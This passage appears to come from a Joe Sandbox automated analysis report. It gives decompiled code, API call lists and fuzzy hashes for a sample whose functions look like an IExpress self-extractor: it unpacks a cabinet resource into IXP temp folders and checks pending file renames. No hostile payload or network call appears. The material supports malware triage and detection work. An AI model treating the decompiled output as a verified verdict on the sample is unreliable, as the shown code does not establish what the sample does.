                                                                      							E00F844B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                      						}
                                                                      					}
                                                                      					if(( *0xf88a38 & 0x00000001) == 0 && ( *0xf89a34 & 0x00000001) == 0) {
                                                                      						SendMessageA( *0xf88584, 0xfa1, _t37, 0);
                                                                      					}
                                                                      					return _t37;
                                                                      				}
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00F84FFE
                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00F85006
                                                                      • LockResource.KERNEL32(00000000), ref: 00F8500D
                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 00F85030
                                                                      • ShowWindow.USER32(00000000), ref: 00F85037
                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 00F8504A
                                                                      • ShowWindow.USER32(00000000), ref: 00F85051
                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00F85111
                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00F85159
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                      • String ID: *MEMCAB$CABINET
                                                                      • API String ID: 1305606123-2642027498
                                                                      • Opcode ID: 9fd27aa6d8d8b7886dafaa694a9eb78d1e5de37c86c2a8ad19fbd96555bd9e79
                                                                      • Instruction ID: 919f73e338f55c4df8eaa356bf5c72729e50ca02cf3ea1352f7d2d173871e4e0
                                                                      • Opcode Fuzzy Hash: 9fd27aa6d8d8b7886dafaa694a9eb78d1e5de37c86c2a8ad19fbd96555bd9e79
                                                                      • Instruction Fuzzy Hash: 4331B870B44B0A7BE7207B61AD8DFF7365DE744FA5F080015F902A62A1DAB9DC01B761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 95%
                                                                      			E00F853A1(CHAR* __ecx, CHAR* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t5;
                                                                      				long _t13;
                                                                      				int _t14;
                                                                      				CHAR* _t20;
                                                                      				int _t29;
                                                                      				int _t30;
                                                                      				CHAR* _t32;
                                                                      				signed int _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t5 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t5 ^ _t33;
                                                                      				_t32 = __edx;
                                                                      				_t20 = __ecx;
                                                                      				_t29 = 0;
                                                                      				while(1) {
                                                                      					E00F8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                      					_t34 = _t34 + 0x10;
                                                                      					_t29 = _t29 + 1;
                                                                      					E00F81680(_t32, 0x104, _t20);
                                                                      					E00F8658A(_t32, 0x104,  &_v268); // executed
                                                                      					RemoveDirectoryA(_t32); // executed
                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                      					if(_t13 == 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t29 < 0x190) {
                                                                      						continue;
                                                                      					}
                                                                      					L3:
                                                                      					_t30 = 0;
                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                      						_t30 = 1;
                                                                      						DeleteFileA(_t32);
                                                                      						CreateDirectoryA(_t32, 0);
                                                                      					}
                                                                      					L5:
                                                                      					return E00F86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                      				}
                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                      				if(_t14 == 0) {
                                                                      					goto L3;
                                                                      				}
                                                                      				_t30 = 1;
                                                                      				 *0xf88a20 = 1;
                                                                      				goto L5;
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F853FB
                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85402
                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8541F
                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8542B
                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85434
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85452
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                      • API String ID: 1082909758-4044985724
                                                                      • Opcode ID: 529d431f5f3824b96a9ff25301eecc8a653d5158ef20de90f8bf2c7841398568
                                                                      • Instruction ID: 1f9009007443b4ea1778144da670676d0015093c884ae24278484a89029772b5
                                                                      • Opcode Fuzzy Hash: 529d431f5f3824b96a9ff25301eecc8a653d5158ef20de90f8bf2c7841398568
                                                                      • Instruction Fuzzy Hash: 3011E77170050867E720BB369C49FFF766DEFC5721F000126F646D2190DE788947A7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 478 f85467-f85484 479 f8548a-f85490 call f853a1 478->479 480 f8551c-f85528 call f81680 478->480 483 f85495-f85497 479->483 484 f8552d-f85539 call f858c8 480->484 485 f8549d-f854c0 call f81781 483->485 486 f85581-f85583 483->486 493 f8553b-f85545 CreateDirectoryA 484->493 494 f8554d-f85552 484->494 495 f8550c-f8551a call f8658a 485->495 496 f854c2-f854d8 GetSystemInfo 485->496 489 f8558d-f8559d call f86ce0 486->489 498 f85577-f8557c call f86285 493->498 499 f85547 493->499 500 f85554-f85557 call f8597d 494->500 501 f85585-f8558b 494->501 495->484 502 f854da-f854dd 496->502 503 f854fe 496->503 498->486 499->494 511 f8555c-f8555e 500->511 501->489 509 f854df-f854e2 502->509 510 f854f7-f854fc 502->510 512 f85503-f85507 call f8658a 503->512 513 f854f0-f854f5 509->513 514 f854e4-f854e7 509->514 510->512 511->501 515 f85560-f85566 511->515 512->495 513->512 514->495 517 f854e9-f854ee 514->517 515->486 518 f85568-f85575 RemoveDirectoryA 515->518 517->512 518->486
                                                                      C-Code - Quality: 75%
                                                                      			E00F85467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				struct _SYSTEM_INFO _v304;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t10;
                                                                      				void* _t13;
                                                                      				intOrPtr _t14;
                                                                      				void* _t16;
                                                                      				void* _t20;
                                                                      				signed int _t26;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				CHAR* _t48;
                                                                      				signed int _t49;
                                                                      				intOrPtr _t61;
                                                                      
                                                                      				_t10 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t10 ^ _t49;
                                                                      				_push(__ecx);
                                                                      				if(__edx == 0) {
                                                                      					_t48 = 0xf891e4;
                                                                      					_t42 = 0x104;
                                                                      					E00F81680(0xf891e4, 0x104);
                                                                      					L14:
                                                                      					_t13 = E00F858C8(_t48); // executed
                                                                      					if(_t13 != 0) {
                                                                      						L17:
                                                                      						_t42 = _a4;
                                                                      						if(_a4 == 0) {
                                                                      							L23:
                                                                      							 *0xf89124 = 0;
                                                                      							_t14 = 1;
                                                                      							L24:
                                                                      							return E00F86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                      						}
                                                                      						_t16 = E00F8597D(_t48, _t42, 1, 0); // executed
                                                                      						if(_t16 != 0) {
                                                                      							goto L23;
                                                                      						}
                                                                      						_t61 =  *0xf88a20; // 0x0
                                                                      						if(_t61 != 0) {
                                                                      							 *0xf88a20 = 0;
                                                                      							RemoveDirectoryA(_t48);
                                                                      						}
                                                                      						L22:
                                                                      						_t14 = 0;
                                                                      						goto L24;
                                                                      					}
                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                      						 *0xf89124 = E00F86285();
                                                                      						goto L22;
                                                                      					}
                                                                      					 *0xf88a20 = 1;
                                                                      					goto L17;
                                                                      				}
                                                                      				_t42 =  &_v268;
                                                                      				_t20 = E00F853A1(__ecx,  &_v268); // executed
                                                                      				if(_t20 == 0) {
                                                                      					goto L22;
                                                                      				}
                                                                      				_push(__ecx);
                                                                      				_t48 = 0xf891e4;
                                                                      				E00F81781(0xf891e4, 0x104, __ecx,  &_v268);
                                                                      				if(( *0xf89a34 & 0x00000020) == 0) {
                                                                      					L12:
                                                                      					_t42 = 0x104;
                                                                      					E00F8658A(_t48, 0x104, 0xf81140);
                                                                      					goto L14;
                                                                      				}
                                                                      				GetSystemInfo( &_v304);
                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                      				if(_t26 == 0) {
                                                                      					_push("i386");
                                                                      					L11:
                                                                      					E00F8658A(_t48, 0x104);
                                                                      					goto L12;
                                                                      				}
                                                                      				_t28 = _t26 - 1;
                                                                      				if(_t28 == 0) {
                                                                      					_push("mips");
                                                                      					goto L11;
                                                                      				}
                                                                      				_t29 = _t28 - 1;
                                                                      				if(_t29 == 0) {
                                                                      					_push("alpha");
                                                                      					goto L11;
                                                                      				}
                                                                      				if(_t29 != 1) {
                                                                      					goto L12;
                                                                      				}
                                                                      				_push("ppc");
                                                                      				goto L11;
                                                                      			}





















                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F854C9
                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8553D
                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8556F
                                                                        • Part of subcall function 00F853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F853FB
                                                                        • Part of subcall function 00F853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85402
                                                                        • Part of subcall function 00F853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8541F
                                                                        • Part of subcall function 00F853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8542B
                                                                        • Part of subcall function 00F853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85434
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                      • API String ID: 1979080616-3963195772
                                                                      • Opcode ID: b1a7f2beff07830a5407aa7bf735c093541617e15bf54abf46a8b67381a72a68
                                                                      • Instruction ID: bc241b1177b749ffbc824f119cf3311f203d3b554e0798736eaf3e8210702c85
                                                                      • Opcode Fuzzy Hash: b1a7f2beff07830a5407aa7bf735c093541617e15bf54abf46a8b67381a72a68
                                                                      • Instruction Fuzzy Hash: F4312971F04A045BCF10BF299C496FF779FAB81F54B0C016AA402CA540DB74CE06B795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 519 f8256d-f8257d 520 f82622-f82627 call f824e0 519->520 521 f82583-f82589 519->521 526 f82629-f8262f 520->526 522 f825e8-f82607 RegOpenKeyExA 521->522 523 f8258b 521->523 528 f82609-f82620 RegQueryInfoKeyA 522->528 529 f825e3-f825e6 522->529 523->526 527 f82591-f82595 523->527 527->526 530 f8259b-f825ba RegOpenKeyExA 527->530 531 f825d1-f825dd RegCloseKey 528->531 529->526 530->529 532 f825bc-f825cb RegQueryValueExA 530->532 531->529 532->531
                                                                      C-Code - Quality: 86%
                                                                      			E00F8256D(signed int __ecx) {
                                                                      				int _v8;
                                                                      				void* _v12;
                                                                      				signed int _t13;
                                                                      				signed int _t19;
                                                                      				long _t24;
                                                                      				void* _t26;
                                                                      				int _t31;
                                                                      				void* _t34;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(__ecx);
                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                      				_t31 = 0;
                                                                      				if(_t13 == 0) {
                                                                      					_t31 = E00F824E0(_t26);
                                                                      				} else {
                                                                      					_t34 = _t13 - 1;
                                                                      					if(_t34 == 0) {
                                                                      						_v8 = 0;
                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                      							goto L7;
                                                                      						} else {
                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                      							goto L6;
                                                                      						}
                                                                      						L12:
                                                                      					} else {
                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                      							_v8 = 0;
                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                      							if(_t24 == 0) {
                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                      								L6:
                                                                      								asm("sbb eax, eax");
                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                      								RegCloseKey(_v12); // executed
                                                                      							}
                                                                      							L7:
                                                                      							_t31 = _v8;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t31;
                                                                      				goto L12;
                                                                      			}












                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00F84096,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?), ref: 00F825B2
                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?,00F84096), ref: 00F825CB
                                                                      • RegCloseKey.KERNELBASE(?,?,00F81ED3,00000001,00000000,?,?,00F84137,?,00F84096), ref: 00F825DD
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00F84096,00F84096,?,00F81ED3,00000001,00000000,?,?,00F84137,?), ref: 00F825FF
                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00F84096,00000000,00000000,00000000,00000000,?,00F81ED3,00000001,00000000), ref: 00F8261A
                                                                      Strings
                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 00F825A8
                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00F825F5
                                                                      • PendingFileRenameOperations, xrefs: 00F825C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                      • API String ID: 2209512893-559176071
                                                                      • Opcode ID: ef950f5a6a8935b6af500e9c7c36b9c9cf68b8555cc58c3bb4ed225a6ec60677
                                                                      • Instruction ID: 3f7f22f73cee6fd3cb285c981160f7b67211c09418aa3547983cb833f8032f69
                                                                      • Opcode Fuzzy Hash: ef950f5a6a8935b6af500e9c7c36b9c9cf68b8555cc58c3bb4ed225a6ec60677
                                                                      • Instruction Fuzzy Hash: E3114235D42228FBAF20AB919C09DFB7FBCDF057A1F544056B808A2011DB30AE45F7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 533 f86a60-f86a91 call f87155 call f87208 GetStartupInfoW 539 f86a93-f86aa2 533->539 540 f86abc-f86abe 539->540 541 f86aa4-f86aa6 539->541 544 f86abf-f86ac5 540->544 542 f86aa8-f86aad 541->542 543 f86aaf-f86aba Sleep 541->543 542->544 543->539 545 f86ad1-f86ad7 544->545 546 f86ac7-f86acf _amsg_exit 544->546 547 f86ad9-f86ae9 call f86c3f 545->547 548 f86b05 545->548 549 f86b0b-f86b11 546->549 553 f86aee-f86af2 547->553 548->549 551 f86b2e-f86b30 549->551 552 f86b13-f86b24 _initterm 549->552 554 f86b3b-f86b42 551->554 555 f86b32-f86b39 551->555 552->551 553->549 556 f86af4-f86b00 553->556 557 f86b44-f86b51 call f87060 554->557 558 f86b67-f86b71 554->558 555->554 560 f86c39-f86c3e call f8724d 556->560 557->558 571 f86b53-f86b65 557->571 559 f86b74-f86b79 558->559 562 f86b7b-f86b7d 559->562 563 f86bc5-f86bc8 559->563 568 f86b7f-f86b81 562->568 569 f86b94-f86b98 562->569 566 f86bca-f86bd3 563->566 567 f86bd6-f86be3 _ismbblead 563->567 566->567 572 f86be9-f86bed 567->572 573 f86be5-f86be6 567->573 568->563 574 f86b83-f86b85 568->574 575 f86b9a-f86b9e 569->575 576 f86ba0-f86ba2 569->576 571->558 572->559 573->572 574->569 577 f86b87-f86b8a 574->577 578 f86ba3-f86bbc call f82bfb 575->578 576->578 577->569 580 f86b8c-f86b92 577->580 583 f86c1e-f86c25 578->583 584 f86bbe-f86bbf exit 578->584 580->574 585 f86c32 583->585 586 f86c27-f86c2d _cexit 583->586 584->563 585->560 586->585
                                                                      C-Code - Quality: 51%
                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed int* _t25;
                                                                      				signed int _t26;
                                                                      				signed int _t29;
                                                                      				int _t30;
                                                                      				signed int _t37;
                                                                      				signed char _t41;
                                                                      				signed int _t53;
                                                                      				signed int _t54;
                                                                      				intOrPtr _t56;
                                                                      				signed int _t58;
                                                                      				signed int _t59;
                                                                      				intOrPtr* _t60;
                                                                      				void* _t62;
                                                                      				void* _t67;
                                                                      				void* _t68;
                                                                      
                                                                      				E00F87155();
                                                                      				_push(0x58);
                                                                      				_push(0xf872b8);
                                                                      				E00F87208(__ebx, __edi, __esi);
                                                                      				 *(_t62 - 0x20) = 0;
                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                      				_t53 = 0;
                                                                      				while(1) {
                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                      					if(0 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(0 != _t56) {
                                                                      						Sleep(0x3e8);
                                                                      						continue;
                                                                      					} else {
                                                                      						_t58 = 1;
                                                                      						_t53 = 1;
                                                                      					}
                                                                      					L7:
                                                                      					_t67 =  *0xf888b0 - _t58; // 0x2
                                                                      					if(_t67 != 0) {
                                                                      						__eflags =  *0xf888b0; // 0x2
                                                                      						if(__eflags != 0) {
                                                                      							 *0xf881e4 = _t58;
                                                                      							goto L13;
                                                                      						} else {
                                                                      							 *0xf888b0 = _t58;
                                                                      							_t37 = E00F86C3F(0xf810b8, 0xf810c4); // executed
                                                                      							__eflags = _t37;
                                                                      							if(__eflags == 0) {
                                                                      								goto L13;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                      								_t30 = 0xff;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_push(0x1f);
                                                                      						L00F86FF4();
                                                                      						L13:
                                                                      						_t68 =  *0xf888b0 - _t58; // 0x2
                                                                      						if(_t68 == 0) {
                                                                      							_push(0xf810b4);
                                                                      							_push(0xf810ac);
                                                                      							L00F87202();
                                                                      							 *0xf888b0 = 2;
                                                                      						}
                                                                      						if(_t53 == 0) {
                                                                      							 *0xf888ac = 0;
                                                                      						}
                                                                      						_t71 =  *0xf888b4;
                                                                      						if( *0xf888b4 != 0 && E00F87060(_t71, 0xf888b4) != 0) {
                                                                      							_t60 =  *0xf888b4; // 0x0
                                                                      							 *0xf8a288(0, 2, 0);
                                                                      							 *_t60();
                                                                      						}
                                                                      						_t25 = __imp___acmdln; // 0x74895b9c
                                                                      						_t59 =  *_t25;
                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                      						_t54 =  *(_t62 - 0x20);
                                                                      						while(1) {
                                                                      							_t41 =  *_t59;
                                                                      							if(_t41 > 0x20) {
                                                                      								goto L32;
                                                                      							}
                                                                      							if(_t41 != 0) {
                                                                      								if(_t54 != 0) {
                                                                      									goto L32;
                                                                      								} else {
                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                      										_t59 = _t59 + 1;
                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                      										_t41 =  *_t59;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                      								_t29 = 0xa;
                                                                      							} else {
                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                      							}
                                                                      							_push(_t29);
                                                                      							_t30 = E00F82BFB(0xf80000, 0, _t59); // executed
                                                                      							 *0xf881e0 = _t30;
                                                                      							__eflags =  *0xf881f8;
                                                                      							if( *0xf881f8 == 0) {
                                                                      								exit(_t30); // executed
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags =  *0xf881e4;
                                                                      							if( *0xf881e4 == 0) {
                                                                      								__imp___cexit();
                                                                      								_t30 =  *0xf881e0; // 0x0
                                                                      							}
                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                      							goto L40;
                                                                      							L32:
                                                                      							__eflags = _t41 - 0x22;
                                                                      							if(_t41 == 0x22) {
                                                                      								__eflags = _t54;
                                                                      								_t15 = _t54 == 0;
                                                                      								__eflags = _t15;
                                                                      								_t54 = 0 | _t15;
                                                                      								 *(_t62 - 0x20) = _t54;
                                                                      							}
                                                                      							_t26 = _t41 & 0x000000ff;
                                                                      							__imp___ismbblead(_t26);
                                                                      							__eflags = _t26;
                                                                      							if(_t26 != 0) {
                                                                      								_t59 = _t59 + 1;
                                                                      								__eflags = _t59;
                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                      							}
                                                                      							_t59 = _t59 + 1;
                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                      						}
                                                                      					}
                                                                      					L40:
                                                                      					return E00F8724D(_t30);
                                                                      				}
                                                                      				_t58 = 1;
                                                                      				__eflags = 1;
                                                                      				goto L7;
                                                                      			}



















                                                                      APIs
                                                                        • Part of subcall function 00F87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F87182
                                                                        • Part of subcall function 00F87155: GetCurrentProcessId.KERNEL32 ref: 00F87191
                                                                        • Part of subcall function 00F87155: GetCurrentThreadId.KERNEL32 ref: 00F8719A
                                                                        • Part of subcall function 00F87155: GetTickCount.KERNEL32 ref: 00F871A3
                                                                        • Part of subcall function 00F87155: QueryPerformanceCounter.KERNEL32(?), ref: 00F871B8
                                                                      • GetStartupInfoW.KERNEL32(?,00F872B8,00000058), ref: 00F86A7F
                                                                      • Sleep.KERNEL32(000003E8), ref: 00F86AB4
                                                                      • _amsg_exit.MSVCRT ref: 00F86AC9
                                                                      • _initterm.MSVCRT ref: 00F86B1D
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F86B49
                                                                      • exit.KERNELBASE ref: 00F86BBF
                                                                      • _ismbblead.MSVCRT ref: 00F86BDA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                      • String ID:
                                                                      • API String ID: 836923961-0
                                                                      • Opcode ID: c1a994f87e7c1a1427cc4e48b9cf580d1dec9f56957ef8da1574bbf1186292f1
                                                                      • Instruction ID: 46546831d4c8cef33a28ba882718b2b2008e84eaeb7e2adfc231b729367f3129
